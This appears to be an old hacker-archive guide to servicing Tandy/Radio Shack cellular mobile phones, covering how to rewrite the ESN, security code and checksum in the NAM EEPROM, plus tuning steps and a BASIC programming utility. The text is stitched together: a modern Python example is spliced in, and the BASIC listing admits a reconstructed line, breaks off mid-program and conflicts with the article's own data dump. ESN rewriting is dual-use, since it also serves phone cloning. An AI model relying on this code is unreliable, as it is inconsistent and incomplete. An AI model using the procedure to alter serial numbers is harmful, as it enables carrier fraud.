photographs. While the hard-copy version is available (see end of
article), you will hopefully be able to figure out what we're talking about
without them.

Disassembly begins by snapping the plastic end panel from the
black transceiver cover. Some units just pop up and off, while others
have two small plastic tabs on each side that must be depressed to
free the end panel for removal.

With the end panel removed, the top plastic cover is now free to
slide off. With this cover removed, the metal transceiver itself
can be dumped from the remaining plastic housing by turning it
upside down, or pulling up on the metal heat sink assembly that
comprises one side of the transceiver unit.

There is a metal shield on each side of the transceiver (top and
bottom.) One is a solid piece of thin sheet metal, and the other
is broken up into smaller, individual shields and soldered to
the transceiver chassis. The shield that needs to be removed is the
solid one. It is only held in place with the friction grips
along the edges, and can be pried off with your fingers.

Once the shield is removed from the proper side of the
transceiver, the solder side of the logic board will be exposed.
This board must be removed to gain access to the component side. Take
static precautions so as not to fry the CMOS silicon that is currently
hidden from view.

Other than several connectors that mate between the two boards,
the board is usually held in place by several blobs of solder spaced
along the edge of the board. These small 'solder welds' serve as
a ground bond between the board and the transceiver chassis, and
are not electrically necessary under normal circumstances.

Once the solder ground bonds have been melted and removed with a
de-soldering tool or solder wick, use a pair of needle-nose pliers
to gently bend back the small metal tabs holding the circuit
board in place.

Before proceeding, inspect the foil side of the board to ensure
that no solder has splashed on the board during de-soldering, and
that the foil traces where the work was performed are still
intact. This last step is where most trouble arises. These boards are
delicate, and a heavy hand while prying or bending will almost
ensure that a trace or five will be transected when the tool
slips. If this happens, resolder the traces to undo the damage.

At this point the logic board is held in place only by pins on
the transceiver board sticking up into sockets on the logic board.
Gripping the edges of the logic board with your fingers and
pulling straight up will disengage the connectors and allow the logic
board to pull free of the transceiver. Slightly rocking the board from
each side may aid in the removal. Do not grip the board with
pliers or damage can result to the small chip resistors and other
components mounted on the solder side of the board.

Once dislodged, you'll have two separate circuit boards.


THE LOGIC BOARD 


The board that supplies logic and control functions for the
cellular mobile telephone is easily identifiable by the
microprocessor and 27C512 EPROM containing the operating
firmware. The EPROM's erase window is covered by a protective sticker
that identifies the firmware version stored therein. Within the last
few years, the version has ranged from TP-2 through TP-8.

Also on this board is the serial EEPROM where the ESN and NAM
parameters are stored. This chip is an 8-pin DIP located in a
socket near pin #1 of the NEC microprocessor. It is usually
covered with a small paper sticker bearing the last few digits of
the serial number stored inside.

While security experts may blast Nokia for designing a phone that
stores the ESN in a socketed chip, and then says "here I am" by
placing a sticker on it, this is a dream come true for any
technician facing issues of data corruption.

The serial EEPROM containing all of this data is a PCD8572 (or
85C72) manufactured by Microchip Technology, Inc.

This 8-pin device is a 1k (128x8) CMOS serial electrically
erasable PROM. The pin configuration for the device can be found in the
appendix.

Power is supplied to this chip only when the microprocessor is
performing a read or write operation. Transistor Q115 (surface
mounted to the underside of the logic board right about in the
middle) switches the supply voltage on and off. Should power be
interrupted during the write cycle, the ESN may become corrupt.


REBUILDING THE ESN 


To replace the damaged serial number, note the unit's serial
number from the cellular service agreement or the phone itself.
The ESN (in decimal) is located on a white paper sticker applied to the
side of the metal transceiver chassis. It is also stamped into the
plastic model identification plate on one side of the plastic
outer housing.


For reprogramming, the ESN must be converted to hex. A scientific 
calculator or any number of public domain computer programs will 
simplify the task. 


CONTENTS OF NAM 


Once the original serial number has been determined, carefully
remove the 8572 EEPROM from the socket and place it in the
adapter required by your PROM programmer. Reading the contents of the
chip, you'll see data as depicted below.

Note that these data dumps are simulated for illustrative purposes.
The ESN and encoded MIN bytes are not legitimate numbers, so don't
bother 'testing' them.

The first five bytes of data contain the security code. These
bytes are the hex values representing ASCII characters 0 through
9, thus represented as "3X" where "X" is the actual digit of the
security code. A factory security code of 1 2 3 4 5 would be
represented in bytes 00 through 04 as follows:

31 32 33 34 35

Since you will require the security code to enter handset
programming mode, please note the current security code or
program these bytes with your shop's standard default.


UNDERSTANDING ADDRESSES 


Some cellular technicians have little experience in the digital
world. Service monitors and watt-meters are expensive and wonderful
devices, but sometimes you need to do a little more than tweak a pot
to fix a phone. The digital-literate can skip this oversimplified
explanation.

To assist those in reading the locations of the various bytes in the EEPROM,
understand that each line (as usually displayed on a programmer) contains
sixteen (16) bytes. The first line begins with byte 00, then 01, 02, 03,
04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E and finally 0F.

The second line begins with 10, then 11, 12, 13, 14, 15, 16, 17,
18, 19, 1A, 1B, 1C, 1D, 1E, and 1F as the last byte of the line.
The third line increments the same way from 20 to 2F, and the fourth
from 30 to 3F. You now know how to count in base 16 (hex)!

As an example, the locations used by the phone end at byte 3D,
which contains 00 in the example below. Beginning with the next
byte (3E), a repetitive pattern of alternating values of AA and
55 is stored. This is just 'test' data and is never read by the
phone. The chip itself ends at byte 7F, and your PROM programmer
may display FF following byte 7F to indicate the non-existence of
these locations in the chip.


8572 EXAMPLE DATA DUMP

0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF 00 AA 55
0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55


THE CRUCIAL SERIAL NUMBER 


The hex ESN for any given phone consists of four bytes, as we use
the term here. Written out it is eight hex digits (32 bits if
expressed in binary form), but we're referring to a 'byte' as a two-digit
hex number, rather than each hex digit as a single entity. For our
example, we're using the fictitious ESN of A521FF0A. All Radio Shack
phones will have an ESN beginning with A5 hex. This is the "manufacturer's
code" prefix that has been assigned to Tandy.

Breaking the ESN into four bytes as viewed on the PROM programmer,
the ESN would appear as:

A5 21 FF 0A

Refer back to the example dump of the data within the 8572 IC.
Immediately following the security code is the ESN stored in
reverse order (least significant byte first). With the security code
occupying bytes 00 to 04, the ESN is located in bytes 05, 06, 07 and 08.
Byte 09 contains the value 38. It should always contain 38.

In the example, beginning with byte 05 you can read the ESN (in
reverse sequence) as:

0A FF 21 A5

The examples below will assist you in visualizing the bytes
containing the security code and the electronic serial number.
The programming and placement of these two crucial pieces of data is
fairly straightforward. Using the buffer editor function of the
PROM programmer, you can simply type over the garbage that may be
present in these locations with the correct values for the
security code and the ESN. Double check your data entry!


OTHER ADDRESSES 


The entire NAM data is stored in the remaining locations of this
chip. Bytes 0A, 0B and 0C contain the firmware revision date,
and bytes 0D - 0F contain the installation date as programmed via the
handset programming mode.

Other bytes contain the encoded Mobile Identification Number
(MIN), Station Class Mark (SCM), etc.

These various bytes do not need to be reprogrammed through your
PROM burner, as they can all be corrected via handset
programming. Only the security code and ESN must be properly reprogrammed
directly to the chip itself. For more information on the locations
of this other data, refer to the source code in Appendix A. It
allows you to see where (and how) this other data is stored within
the NAM.

The last item to program is the checksum.

THE SECURITY CODE: BYTES 00 - 04

0000 31 32 33 34 35 XX XX XX XX XX XX XX XX XX XX XX

THE ESN: BYTES 05 - 08

0000 XX XX XX XX XX 0A FF 21 A5 XX XX XX XX XX XX XX

LOCATING THE CHECKSUM

There is a one byte device checksum stored within the 8572 that
is used by the phone to check the integrity of the data stored
therein. The checksum is located at byte 3D, indicated by "XX"
in the example below.


The checksum is derived from all the data stored in the NAM, not 
just the ESN. Computing it is relatively easy as it is simply 
the sum (in hex) of all the values from bytes 00 through 3C as 
listed below. 

Assuming the PROM programmer has a checksum function, you can 
enter the beginning address as 0000 and the ending address as 003C. 
The software will add all of the values between these locations and 
give you the sum. The alternative is to add the numbers manually 
using the hex mode of a scientific calculator. Either way, adding 
the hex values of all the bytes between 00 and 3C of our example yields 
a sum of 0B5E. 

The least significant byte of the sum is the actual device 
checksum that is programmed in location 3D. In our example, the 
least significant byte is 5E. Ignoring the most significant byte of 
the sum (0B), a value of 5E must be programmed to location 3D. 


Note that the checksum will be recomputed and change after 
handset programming. When the MIN or other data is changed, it alters 
the values in various bytes. The checksum encompasses all of the 
NAM data (bytes 00 through 3C) used by the transceiver’s firmware. 


CHECKSUM LOCATION 

0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A 
0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA 
0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11 
0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55 
0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 

BYTES SUMMED TO DERIVE CHECKSUM (00 through 3C) 

0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A 
0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA 
0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11 
0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF 


DEFAULT VALUES 

In the event that all of the data stored within the NAM becomes 
corrupt, the technician will need to program the security code, 
the ESN, and certain default data values to allow the phone to power 
up. Once powered up, all of the other data can be automatically 
reconstructed by the phone using the handset programming mode. 

Since the factory does not provide any information about the 
contents of the 8572 EEPROM, we are unsure of the function of 
this ’default data.’ It seems to have little significance. 

The bytes given explicitly (not XX) below are fairly typical. Ideally 
the technician should compare the contents of an operational 
phone with equivalent firmware to determine the values for these 
locations, but if this is not possible then the values 
provided in the example may suffice. 


Once these defaults have been programmed in the proper locations, 
and the ESN and security code have been reconstructed, compute 
the checksum and store it in address 3D. Temporarily reassemble the 
phone and apply power. The unit should power up and complete its 
self-test, which includes the operation where the microprocessor 
computes the NAM checksum and compares it to the value stored in 
location 3D. 

Assuming the self-diagnostics pass, the remaining data can now be 
reconstructed through normal handset programming. 

The handset programming template applicable to most of these 
units is located immediately following the appendix detailing the chip 
programming software included for reference purposes. 


DEFAULT DATA VALUES 

0000 XX XX XX XX XX XX XX XX XX 38 XX XX XX XX XX XX 
0010 00 00 00 00 XX XX XX XX XX XX XX XX XX XX XX XX 
0020 XX XX XX XX XX XX XX 00 27 00 01 01 11 11 11 11 
0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55 
0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 


ADDITIONAL NOTES 

As discussed, the parallel port programming software interface 
has a few quirks, most involving the programming voltage supplied to 
the chip. If all else fails, and a PROM burner is not available, 
take the supply voltage (Vcc) directly from the logic board. 

Run test lead jumpers from pins #4 and #8 of the IC socket on the 
logic board that held the 8572 EEPROM and connect to the 
respective pins on the socket attached to the cable to be used for 
programming. Turn the board over and locate surface mount 
transistor Q115 which switches the supply voltage to the IC 
socket on and off. 

This small chip transistor is directly to the left of pin #8 (of 
the 8572 socket) and can be positively identified by the circuit 
trace from socket pin #8 leading directly to the emitter of Q115. 
By examining this area of the board, you can determine which of 
the other two traces connects to the transistor’s collector. 

Jumpering the traces and shorting the collector and emitter simply 
provides a constant, conditioned voltage supply to the socket designed to 
power the 8572 in programming mode. It may also be necessary to cut the 
trace to the base of Q115. 

Once the chip has been programmed with the software, restore the 
integrity of the cut trace to the base of Q115 and remove the 
short between the collector and emitter. 


USING THE SOFTWARE 

The Cellular Data Repair Utility software requires that you first 
create a small text file using an ASCII text editor such as DOS’s 
"EDIT" utility program. 

This text file must contain the data described below in the 
specific order presented, one value per line. The data in this image 
(.img) file will be programmed into the 8572. 

XXX           ESN Prefix (decimal) 
XXXXXXXX      ESN (8 digits decimal) 
XXXXX         SIDH (5 digits decimal) 
1             Access Bit 
1             Local Option Bit 
AAAPPPXXXX    MIN (10 digits) 
08            SCM 
0XXX          Initial Paging Channel (0333 or 0334) 
10            Access Overload Class 
1             Pref. System Bit 
10            GIM 
12345         Security Code 


EXAMPLE IMAGE 
Filename: TEST.IMG 

165 
00246812 
00031 
1 
1 
5105551212 
08 
0334 
10 
1 
10 
12345 
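The checksum rule, the ESN and security code placement, the default data 
and the .IMG field list above, worked through in Python. This is an added 
example and not the Cellular Data Repair Utility reproduced in Appendix A; 
it uses only the byte positions the article documents, fills the bytes the 
article marks XX with 00 (an assumption, not a documented value), and the 
key names it uses for the .IMG fields are its own. Running it checks that 
the published example dump sums to 0B5E, reads back prefix 165 / serial 
21FF0A and security code 12345, and prints a burnable recovery image built 
from TEST.IMG: 

```python
"""NAM image checks for the 8572 layout documented above.

Added worked example, not the article's BASIC utility. Uses only the byte
positions the article gives: security code at 00-04 as ASCII digits, ESN at
05-08 (24-bit serial low byte first, manufacturer prefix last), the constant
38 at 09, the DEFAULT DATA VALUES bytes, and the checksum (low byte of the
sum of bytes 00-3C) at 3D. Bytes the article marks XX are filled with 00
here; that fill value is an assumption.
"""
import re

NAM_SIZE = 0x80
CHECKSUM_ADDR = 0x3D

# Fixed bytes from the article's DEFAULT DATA VALUES dump.
DEFAULT_DATA = {0x09: 0x38, 0x10: 0, 0x11: 0, 0x12: 0, 0x13: 0, 0x27: 0,
                0x28: 0x27, 0x29: 0, 0x2A: 1, 0x2B: 1, 0x2C: 0x11, 0x2D: 0x11,
                0x2E: 0x11, 0x2F: 0x11, 0x30: 0x11, 0x31: 0x08, 0x32: 0x4D,
                0x33: 1, 0x34: 0x0F, 0x35: 1, 0x36: 0x0F, 0x37: 0, 0x38: 4,
                0x39: 0, 0x3A: 0, 0x3B: 0, 0x3C: 0xFF}

# Line order of the .IMG file as listed under USING THE SOFTWARE (key names are ours).
IMG_FIELDS = ("esn_prefix", "esn", "sidh", "access", "local_option", "min",
              "scm", "ipch", "overload_class", "pref_system", "gim",
              "security_code")

# The article's CHECKSUM LOCATION dump with the computed 5E placed at 3D.
EXAMPLE_DUMP = """
0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF 5E AA 55
""" + "".join("%04X" % a + " AA 55" * 8 + "\n" for a in range(0x40, 0x80, 16))

# The article's TEST.IMG, one field per line.
TEST_IMG = "165\n00246812\n00031\n1\n1\n5105551212\n08\n0334\n10\n1\n10\n12345\n"


def parse_dump(text):
    """Turn 'ADDR b0 b1 ...' hex-dump lines into a 128-byte image."""
    img = bytearray(b"\xff" * NAM_SIZE)
    for line in text.strip().splitlines():
        addr, *cells = line.split()
        for offset, cell in enumerate(cells):
            img[int(addr, 16) + offset] = int(cell, 16)
    return img


def format_dump(img):
    """Render an image in the article's 16-bytes-per-line layout."""
    return "\n".join("%04X " % a + " ".join("%02X" % b for b in img[a:a + 16])
                     for a in range(0, len(img), 16))


def nam_checksum(img):
    """Low byte of the sum of bytes 00-3C; the phone compares it with byte 3D."""
    return sum(img[:CHECKSUM_ADDR]) & 0xFF


def decode_esn(img):
    """Bytes 05-07 hold the serial low byte first; byte 08 is the prefix."""
    return img[8], img[5] | (img[6] << 8) | (img[7] << 16)


def encode_esn(prefix, serial):
    if not (0 <= prefix <= 0xFF and 0 <= serial < 1 << 24):
        raise ValueError("ESN prefix must fit 8 bits and serial 24 bits")
    return bytes([serial & 0xFF, (serial >> 8) & 0xFF, serial >> 16, prefix])


def decode_security_code(img):
    code = img[0:5].decode("ascii", errors="replace")
    if not code.isdigit():
        raise ValueError("bytes 00-04 are not five ASCII digits")
    return code


def parse_img(text):
    """Read the twelve-line .IMG file and check the constraints the article
    states: ten-digit MIN, paging channel 0333 or 0334, five-digit code."""
    values = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(values) != len(IMG_FIELDS):
        raise ValueError("expected %d lines, got %d" % (len(IMG_FIELDS), len(values)))
    rec = dict(zip(IMG_FIELDS, values))
    if not re.fullmatch(r"\d{10}", rec["min"]):
        raise ValueError("MIN must be ten digits")
    if rec["ipch"] not in ("0333", "0334"):
        raise ValueError("initial paging channel must be 0333 or 0334")
    if not re.fullmatch(r"\d{5}", rec["security_code"]):
        raise ValueError("security code must be five digits")
    return rec


def build_recovery_image(security_code, esn_prefix, esn_serial):
    """Minimal image for a wiped phone: defaults, security code, ESN and
    checksum, with AA 55 above 3D. Handset-programmable fields are left
    for handset programming, as the DEFAULT VALUES section describes."""
    if not re.fullmatch(r"\d{5}", security_code):
        raise ValueError("security code must be five digits")
    img = bytearray(NAM_SIZE)                     # undocumented bytes: 00 (assumed)
    for a in range(CHECKSUM_ADDR + 1, NAM_SIZE):  # 3E..7F alternate AA 55
        img[a] = 0xAA if a % 2 == 0 else 0x55
    for a, v in DEFAULT_DATA.items():
        img[a] = v
    img[0:5] = security_code.encode("ascii")      # "12345" -> 31 32 33 34 35
    img[5:9] = encode_esn(esn_prefix, esn_serial)
    img[CHECKSUM_ADDR] = nam_checksum(img)
    return img


if __name__ == "__main__":
    rec = parse_img(TEST_IMG)
    print(format_dump(build_recovery_image(rec["security_code"], int(rec["esn_prefix"]), int(rec["esn"]))))
```

The image this prints can be loaded into a programmer's buffer editor as-is; 
the phone will recompute and overwrite byte 3D itself once the remaining 
fields are entered through the handset. 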


PROGRAMMING 

Once the image file containing the appropriate data has been 
saved, run the software with QBASIC or Microsoft BASIC and follow the 
prompts. Be sure to first set the proper parallel port address in line 
1950 to reflect the port to which the interface is connected. 

TUNING STEPS 


1) With a digital voltmeter attached to the positive terminal 
of C908, adjust VR908 to provide a reading of 8 VDC (+/- 0.1 volt). 

2) With the voltmeter attached to the positive terminal of 
C913, adjust VR918 for a reading of 8 VDC (+/- 0.1 volt). 

3) Connect the voltmeter to test point TXV and enter diagnostic 
command 0, 1, SEL, 9, END. Adjust C676 to achieve a reading of 5 
VDC control voltage (+/- 0.1 volt). 

4) Check receiver control voltage with test point RXV. Adjust 
C614 for a reading of 4 VDC (+/- 0.1 volt). 

5) With a power meter connected to the antenna connector of 
the transceiver through an attenuator, enter command SEL, 1, 2, SND, 
END to turn on the transmitter at high power. VR814 should then 
be adjusted to show 3 watts (34.8 dBm) on the power meter. 

6) Using the same power meter, enter command SEL, 1, 3, 7, END. 
Adjust VR846 for a low power maximum reading of 4 milliwatts (6 
dBm). 

7) Using a frequency counter to measure the output of the 
antenna connector, adjust X600 for a reading of 836.4000 MHz (+/- 0.1 kHz). 

8) Using a deviation meter, activate DTMF tones with command 
SEL, 2, 1, END, 1, 1, END and adjust VR259 for 8.4 kHz +/- 0.1 kHz DTMF 
deviation. 

9) End DTMF signaling with command 1, 0, END. Enable SAT 
transmission by entering SEL, 2, 8, SND, END and adjust VR261 for 
7.8 kHz deviation (+/- 0.1 kHz). 

10) Enter SND, END to discontinue SAT signaling. 

ADDITIONAL ADJUSTMENTS 

The level of audio fed to the earphone via the "ear" line (pin #7 
on the handset connector) can be adjusted via VR215. 1.2 Vrms is 
the factory specified level with the volume turned up to its 
maximum setting. 

Received audio signals can be adjusted for minimal distortion by 
peaking L703. 

Frequency deviation of voice audio can be fine tuned with VR260. 
Factory spec. is for 8 kHz deviation. 


POWER LOSS 

If the transceiver refuses to even power up and begin self-diagnostics, 
check the traces on the underside of the board near the power connector. 

Most of these units ’protect’ themselves against reverse polarity 
being present on the power cables with fusible traces. If the 
phone is connected to a vehicle or battery power supply backwards, 
one of these very small circuit traces will vaporize, leaving the 
phone inoperative. 

While inconvenient for the customer and service technician alike, 
repairing the trace is an additional source of revenue for the 
shop that might not be generated had a standard replaceable fuse or 
rectifier been utilized in the design. 

APPENDIX III 

TECHNICAL RESOURCES 

In preparing this article and performing other research involving various 
types of firmware, we used the EPROM+ programming system from Andromeda 
Research. This small, portable device is housed in a carrying case and 
requires no internal card to operate with your PC. Once the software is 
installed on the computer, the EPROM+ programmer is simply plugged into an 
available parallel printer port. 

To program the PCD8572 series EEPROMs, a small adapter is required. 
You can construct this yourself from the included instructions, 
or purchase it already built for about $35 extra. 

The EPROM+ programming system is available for $289 from the 
manufacturer: 

Andromeda Research 
P.O. Box 222 
Milford, Ohio 45150 
(513) 831-9708 - voice 
(513) 831-7562 - fax 


SERVICE MANUALS 


Service manuals are available for most Radio Shack or Tandy products from 
Tandy National Parts. Ordering these publications requires that you visit 
your local Radio Shack store. Tell the clerk that you want him (or her) 
to call National Parts and order a service manual for catalog number.... 


National Parts no longer accepts calls from consumers and will only 
ship to a recognized Radio Shack retail outlet. 


NOKIA - MOBIRA 

Service handsets, manuals and other parts can be ordered from 
Nokia-Mobira in Largo, Florida. Their toll-free technical 
assistance number is (800) 666-5553. 

TANDY FAX-BACK SERVICE 

Tandy Support Services offers technical information via fax-back 
server. There is no mention that the service is restricted to 
Radio Shack stores. Although ANI can be hell, the toll-free number 
is (800) 323-6586 if you want to be faxed product info on assorted ’Shack 
products. The server makes neat video game noises, and thanks you for 
using the service. 


For an index of the cellular specification sheets available via 
fax-back, request document #8882. 


Programming instructions are also available from this automated 
fax server: 


DOCUMENT #   PHONE MODEL 

9009         Current List [index] 
8728         CT-105, 1050, 1055 
9004         CT-350 
9005         CT-302 
9006         CT-102, 103, 104, 1030, 1033 
9007         CT-300, 301 
9008         CT-100, 101, 200, 201 
9020         CT-351 
9665         BC901ST [170-1015] 
9579         CP-1700 [170-1016] 
9577         CP-4600/5600 [170-1067 / 170-1056] 
14493        Ericsson AH-210 [170-1064] 
9581         EZ-400 [170-1057] 
9743         Motorola 12822 [170-1058] 
9583         Motorola DPC550 [170-1059] 

This information provided for reference purposes only. Use of 
this fax-back service may be restricted to authorized personnel. No 
one has ever faxed me to complain, however. 


THE INTERFACE 

The uuencoded drawing which accompanies this article describes the 
interface required to use the programming software to rebuild the data 
stored within the serial EEPROM. Because there are a number of variables 
that can affect the performance of this software and interface, prepare 
yourself for a bit of trial and error. A standard programming device is 
recommended over the use of this software. Since the original publication 
of this manual in hard-copy, we’ve heard reports that the software does not 
work well with the PCD8572, but does favor the PCD85C72 (CMOS version). 

The DB-25 connector is wired to an 8-pin DIP socket to accommodate the 8572 
integrated circuit. A regulated, well-filtered source of 5 volts must be 
connected to pin #8 of the DIP socket, and pin #4 must be tied to ground. 
If the PC used for programming and the power source to the IC socket share 
a common ground, you may be able to use pin #25 of the parallel port connector 
as shown in the diagram. 

Please be careful not to cause any shorts in this instance or you 
may damage your computer by sinking too much current through the 
parallel port. If you are unsure of what you are doing, eliminate 
the connection between pin #4 of the IC socket and pin #25 of the 
DB-25 connector. Instead, connect pin #4 directly to ground. 

The resistor shown in the circuit is used as an optional voltage 
divider. Depending on the voltage provided by pin #2 of your 
parallel port, a resistor between 100 and 1k ohms may be required 
to drop it to a level within the nominal range required by the 
EEPROM. 

TUNING THE RADIO 


The diagrams in the uuencoded .zip file will assist in identifying and 
locating the various adjustment points on the logic board and transceiver (RF) 
PC board. Alignment should not be attempted by technicians unfamiliar with 
the principles involved, or in the absence of calibrated radio frequency 
measurement equipment. 


A diagnostic (service) handset may be required to access 
service-level commands within the transceiver. If the phone does 
not respond properly to the commands documented herein, you’1ll 
need to obtain a service handset from Tandy National Parts. This 
handset is actually a Nokia "programming handset" which can be 
obtained directly from the factory. 


PROGRAMMING TEMPLATE 


For Tandy / Radio Shack Cellular Mobile Telephones 
Models CT-102, 302, 1030, 1033, etc. 

1) Power up phone. After the phone cycles through its 
self-test mode and the display clears, enter the following keystrokes from 
the keypad: 

Re 3, 0, 0, 1, #, X, X, X, X, X, SEL, 9, END 

The X, X, X, X, X represents the five-digit security code stored 
in EEPROM. The factory default is 1, 2, 3, 4, 5. This security 
code is required to access handset programming mode. 


2) The display will now read: IdEnt IF InFO Pri 


3) Press END to program NAM 1. Display will show first 
programming step. 


4) To program NAM 2, press SND twice instead of END. Display 
will cycle through: OPt InFO diSAbLEd then OPt InFO EnAbLEd 


5) Use the END key to step through each step. The SND key 

toggles the state of single-digit options. To enter new 

information, use END to step through the display until the old 

data is displayed. Key in the new data and press END to increment to 
the next step. 


6) When programming has been completed, press SEL, CLR to save 
changes. 

Step #  Desired Input   Display     Data Description 

01      5 digits        HO-Id       SIDH (Home System Identification) 
02      0 or 1          MIN Mark    MIN Mark (Toggle with SND) 
03      0 or 1          LOCL OPt    Local Use Mark (Toggle with SND) 
04      10 digits       Phon        MIN (Area Code + Mobile Number) 
05      08              St CLASS    SCM (Station Class Mark) 
06      333 or 334      PAging Ch   IPCH (Initial Paging Channel) 
07      2 digits        O-LOAd CL   Access Overload Class 
08      A or B          PrEF SyS    Preferred System (Toggle with SND) 
09      2 digits        grOUP Id    GIM Mark (Set to 10 in U.S.) 
10      5 digits        SECUrity    Security Code 
11      -               1 dAtE      Firmware Date - not changeable 
12      mmddyy          2 dAtE      Installation Date 

Press SEL, CLR to save & exit. Turn Power off and back on for 
model CT-302. 


[Begin Editorial] 

HOW TO OBTAIN A HARD-COPY VERSION OF THIS FILE - WITH ALL PHOTOS: 

"The Complete Guide to Tandy / Radio Shack Cellular Hardware" is available 
for $15 prepaid. We keep $5 of the price to cover the cost of printing 
and the Priority mail postage. The remaining $10 of the purchase price will 
be donated to Boston’s The L0pht to help them cover the cost of upgrading 
their Internet connection for l0pht.com.... 

The guys at the L0pht have always been cool with us, and maintain what 
amounts to one of the best cellular archives accessible on the ’net. We 
want to do what we can to assist them in providing this public source of 
enlightenment. Now you can help them, and get something for it in return. 
If nothing else, you can sit back and enjoy all my great close-up photos 
of the chips <g>! 

-- Damien Thorn 

Here’s the address: 

Phoenix Rising Communications 
3422 W. Hammer Lane, Suite C-110 
Stockton, California 95219 

[end editorial] 

You can reach me via e-mail at: damien@prcomm.com 


1000 ' CELLULAR DATA REPAIR UTILITY
1005 ' Form image and program PCD8572 IC via LPT port.
1010 ' (c) 1993, 1994, 1995 WarpCoreBreachGroup - All rights reserved.
1020 ' This program is not shareware/freeware
1030 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 00-07
1040 DATA xx,38,xx,xx,xx,xx,xx,xx ' Bytes 08-15
1050 DATA 00,00,00,00,xx,xx,xx,xx ' Bytes 16-23
1060 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 24-31
1070 DATA xx,xx,xx,D6,C5,5C,C6,00 ' Bytes 32-39
1080 DATA 27,00,01,01,11,11,11,11 ' Bytes 40-47
1090 DATA 11,08,4D,01,0F,01,0F,00 ' Bytes 48-55
1100 DATA 04,00,00,00,FF          ' Bytes 56-60
1105 UNIT1$="050490"              ' Firmware date (mmddyy) for bytes 10-12
1110 DIM BYTE$(60),BYTE(61)
1120 FOR I=0 TO 60:READ BYTE$(I):NEXT
1130 FILES "*.IMG"
1140 LINE INPUT "Which file do you want to read? ";F$
1150 OPEN "I",#1,F$+".IMG"
1160 INPUT#1,ESNPREFIX
1170 INPUT#1,ESN#
1180 INPUT#1,HOMEID
1190 INPUT#1,ACCESS
1200 INPUT#1,LOCALOPT
1210 INPUT#1,PHONE$
1220 INPUT#1,STATCLASS
1230 INPUT#1,PGCH
1240 INPUT#1,OVERLDCL
1250 INPUT#1,PREFSYS
1260 INPUT#1,GROUPID
1270 INPUT#1,SEC$
1280 ' Building binary image
1285 ' Installation date (mmddyy) taken from today's DATE$ ("MM-DD-YYYY");
1286 ' the source string was garbled in this copy and DATE$ is reconstructed.
1290 UNIT2$=MID$(DATE$,1,2)+MID$(DATE$,4,2)+MID$(DATE$,9,2)
1300 CLOSE #1
1310 FOR I=1 TO 5:BYTE$(I-1)="3"+MID$(SEC$,I,1):NEXT   ' Security code as ASCII digits
1320 FOR I=0 TO 2:BYTE$(10+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT1$,I*2+1,2))),2)
1325 NEXT
1330 FOR I=0 TO 2:BYTE$(13+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT2$,I*2+1,2))),2)
1335 NEXT
1340 FOR I=0 TO 4:BYTE$(24+I)=MID$(PHONE$,2*I+1,2):NEXT
1350 FOR I=5 TO 0 STEP -1          ' Decimal ESN serial to six hex digits
1360 Q=INT(ESN#/(16^I))
1370 ESN#=ESN#-Q*(16^I)
1380 IF Q>9 THEN Q=Q+7
1390 ESN$=ESN$+CHR$(48+Q)
1400 NEXT
1410 BYTE$(8)=RIGHT$("0"+HEX$(ESNPREFIX),2)   ' Manufacturer prefix in byte 08
1420 BYTE$(5)=MID$(ESN$,5,2)                  ' Serial, low byte first, in 05-07
1430 BYTE$(6)=MID$(ESN$,3,2)
1440 BYTE$(7)=MID$(ESN$,1,2)
1450 FOR I=0 TO 60:Q$=BYTE$(I)                ' Hex strings to bytes, summing for checksum
1460 QH=ASC(LEFT$(Q$,1))-48:IF QH>9 THEN QH=QH-7:IF QH>15 THEN QH=QH-32
1470 QL=ASC(RIGHT$(Q$,1))-48:IF QL>9 THEN QL=QL-7:IF QL>15 THEN QL=QL-32
1480 Q=QH*16+QL
1490 BYTE(I)=Q:CHECK=CHECK+Q
1500 NEXT
1510 BYTE(20)=HOMEID AND 255:BYTE(21)=INT(HOMEID/256)
1520 BYTE(22)=ACCESS
1530 BYTE(23)=LOCALOPT
1540 BYTE(29)=STATCLASS


1550 BYTE(30)=PGCH AND 255:BYTE(31)=INT(PGCH/256)
1560 BYTE(32)=OVERLDCL
1570 BYTE(33)=PREFSYS
1580 BYTE(34)=GROUPID

